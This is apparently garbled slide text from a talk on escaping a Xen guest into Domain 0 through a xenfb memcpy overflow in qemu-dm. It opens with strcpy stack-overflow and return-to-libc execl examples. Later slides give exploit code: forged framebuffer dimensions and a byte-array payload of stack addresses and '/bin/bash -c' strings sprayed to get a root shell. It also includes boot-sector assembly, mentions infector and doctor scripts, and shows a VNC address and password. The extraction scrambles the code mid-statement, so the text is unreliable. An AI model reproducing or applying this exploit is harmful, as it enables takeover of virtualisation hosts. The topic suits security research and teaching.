1
2
3
4
5
GNUDebugger 6
7
void main(int argc, char **argv){ vulncpy(argv[1]); return; } void vulncpy(char *a){ char buf[30]; strcpy(buf, a); return; } *argv[1] buf Shellcode *argv[1]... &buf &buf 8
strcpy 9
10
11 Xen Hypervisor 3.1.2 ds->data wh Domain U Domain 0 Xen Hypervisor ds->data = realloc(ds->data, w * h * vs->depth);
12 Domain 0 memcpy(void *dest, void *src, size_t n) VNC Domain 0 stack memcpy xenfb->ds->data memcpy xenfb->pixels Shared mem Domain U Shared mem memcpy(xenfb->ds->data +(line*xenfb->ds->linesize) +(x*xenfb->ds->depth/8), xenfb->pixels +(line*xenfb->row_stride) +(x*xenfb->depth/8), w*xenfb->depth/8 );
static void xenfb_guest_copy(struct xenfb *xenfb, int x, int y, int w, int h){... for (line = y; line < (y+h); line++){ memcpy(...); static void xenfb_on_fb_event(struct xenfb *xenfb){... x = MAX(event->update.x, 0); y = MAX(event->update.y, 0); w = MIN(event->update.width, xenfb->width - x); h = MIN(event->update.height, xenfb->height - y); if (w < 0 h < 0) {... if (x!= event->update.x y!= event->update.y w!= event->update.width h!= event->update.height) 13
&buf buf Shellcode &buf...... 14
Caller ESP... 15
int execl(const char *path, const char *arg,...) 1 main(){ 2 char *path = "/bin/bash"; 3 char *arg0 = "bash"; 4 char *arg1 = "-c"; 5 char *arg2 = "ls"; 6 execl(path, arg0, arg1, arg2, NULL); 7 8 return; 9 } <main+0> <main+8> Code... <execl+0> Code... ESP path /bin/bash arg0 bash arg1 -c arg2 ls <execl+0> <main+6> 16
&buf ESP dummy data <execl +0> /bin/ bash -c ls <exit+0> path arg0 arg1 arg2 17
18 1183744 bytes xenfb_refresh static int devinit xenfb_probe(struct xenbus_device *dev,...){... ret = register_framebuffer(fb_info);... info->page->width = 9600000; info->page->height = 2769471; info->update_wanted = 1; xenfb_refresh(info, 0, 0, 1, 1);... xenfb_do_update(info, 336261, 1011, 32, 1); ds->data = realloc(ds->data, w * h * vs->depth); for (line = y; line < (y+h); line++){ memcpy(...);
notify_remote_via_irq(info->irq); static void xenfb_do_update(...){... char *ptr = info->fb; char exploit[125] = "\x10\x18\xe8\xb7" "\x90\x90\x90\x90" "\x38\xb6\xff\xbf" "\x42\xb6\xff\xbf" "\x47\xb6\xff\xbf" <execl+0> <dummy> <path> <arg0> <arg1> int i = "\x4a\xb6\xff\xbf" 0; int payload_shift "\x00\x00\x00\x00" = 45; "/bin/bash\0" if(h!= "bash\0" 1) return; "-c\0" ptr += "Root payload_shift; Shell Command"; while(i++ < xenfb_mem_len*15) *ptr++ = exploit[i%(125)]; <arg2> NULL 19
Dom. U (Debian 6) 2.6.26-1-xen-686 Dom. 0 (Debian 5) 2.6.26-1-xen-686 Kernel qemu-dm 3. realloc() 6. memcpy() Xen Hypervisor 3.2.0 Intel Core Duo T2400 20
21
22
23
times 510-($-$$) db 0 Boot_Signature dw 0AA55h org 7C00h pushad mov [cs:boot_stack_pointer],esp cli cld... mov gs,bx test dl,80h jz Drive_Error test dh,00100000b jnz Drive_Error mov [Boot_Drive],dx mov ax, 023eh mov cx, 0002h jmp mov 0000h:System_Loader dx, [Boot_Drive] mov bx, 0000h mov es, bx mov bx, System_Loader int 13h 24
windows hvm config builder='hvm' vnclisten="140.115.80.83" vncpasswd='9527' vncunused=1 windows hvm tightvnc hvm binary make debug xm dmesg infector.sh <target_image> doctor.sh <target_image> 25